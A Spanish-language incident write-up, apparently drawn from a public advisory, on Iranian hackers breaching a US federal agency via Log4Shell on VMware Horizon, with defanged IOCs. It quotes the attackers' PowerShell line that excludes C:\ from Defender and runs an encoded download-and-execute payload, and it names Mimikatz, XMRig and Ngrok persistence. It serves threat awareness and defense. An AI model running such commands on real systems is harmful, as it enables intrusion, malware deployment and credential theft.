IOCs de Hackers iraníes

Un grupo de hackers iraníes consiguen comprometer la Federal Civilian Branch (FCEB) donde se detectó actividad sospechosa de amenaza
persistente avanzada (APT). El cual utilizaron la vulnerabilidad Log4Shell en un servidor VMware Horizon sin parchear, instalaron un software de
criptominiería XMRig moviéndose lateralmente al controlador de dominio, comprometieron las credenciales y luego implementaron proxies inversos Ngrok para mantener la persistencia.

Ejecución del ataque

El ataque se llegó a detectar gracias al IOC de una IP maliciosa ya identificada, esta IP se asocia a otros intentos de explotación de
la vulnerabilidad Log4Shell en servidores VMware Horizon. Se observó peticiones HTTPS desde la IP 51[.]89.181[.]64 al servidor VMware de la organización. A continuación, se observa una supuesta devolución de la llamada LDAP en el puerto 443 a esa dirección IP, también existen consultas DNS a us‐nation‐ny[.]cf que resuelve a la IP ya mencionada.

Explotación realizada

Una vez explotada la vulnerabilidad Log4Shell para el acceso inicial en el servidor VMware Horizon, se observa que hay una conexión a una IP
maliciosa 182[.]54.217[.]2. La explotación ejecutó el siguiente comando en PoweShell agregando una herramienta para evadir el Windows Defender.

powershell try{Add-MpPreference -ExclusionPath ‘C:\’; Write-Host ‘added-exclusion’} catch {Write-Host ‘adding-exclusion-failed’ }; powershell -enc «$BASE64 encoded payload to download next stage and execute it»

Con la explotación, también se añadió la carpeta drive en el directorio C:\, esto permite a los criminales descargarse herramientas en esa ruta sin que haya un escaneo de virus. También se produjo la descarga mdeploy.txt de 182[.]54.217[.]2/mdepoy.txt a C:\users\public\mde.ps1. Cuando se ejecutó, mde.ps1 hubo una descarga file.zip desde 182[.]54.217[.]2 y elimino mde.ps1.

El zip contenía el software y configuración de XMRig, el criptomineador:
•    WinRing0x64.sys – Driver
•    wuacltservice.exe – Mineador
•    config.json – Confirguración

•    RuntimeBroker.exe – Que se trata de un archivo que puede crear un usuario local y realizar pruebas de conexión realizando pings a la 8.8.8.8.

Mantener persistencia

Una vez que han explotado y han obtenido el acceso en el servidor VMware Horizon, los ciberdelincuentes usan RDP y generan un usuario de Windows un DefaultAccount para moverse lateralmente a un VMware VDI-KMS, en este momento los atacantes descargan 30 megabytes de archivos donde se encuentra transfer[.]sh  servidor asociado con la IP 144[.]76.136[.]153 y algunas herramientas:

•    PsExec
•    Mimikatz

•    Ngrok – proxy inverso

Implementaron Ngrok en varios equipos para mantener la persistencia en caso de perder conexión, también realizaron sesiones RDP, que solo eran alcanzables en la red local como conexiones salientes del puerto 443 a  tunnel.us.ngrok[.]com y korgn.su.lennut[.]com.

Una vez que todo estuviese establecido, la explotación, el acceso inicial y la persistencia, los cibercriminales ejecutaron el siguiente comando en PowerShell y el Active Directory para obtener una lista de todas las máquinas conectadas.

Powershell.exe get-adcomputer -filter * -properties * | select name,operatingsystem,ipv4address >

También cambiaron la contraseña de la cuenta de administrador local en varios dispositivos y realizaron copias de seguridad.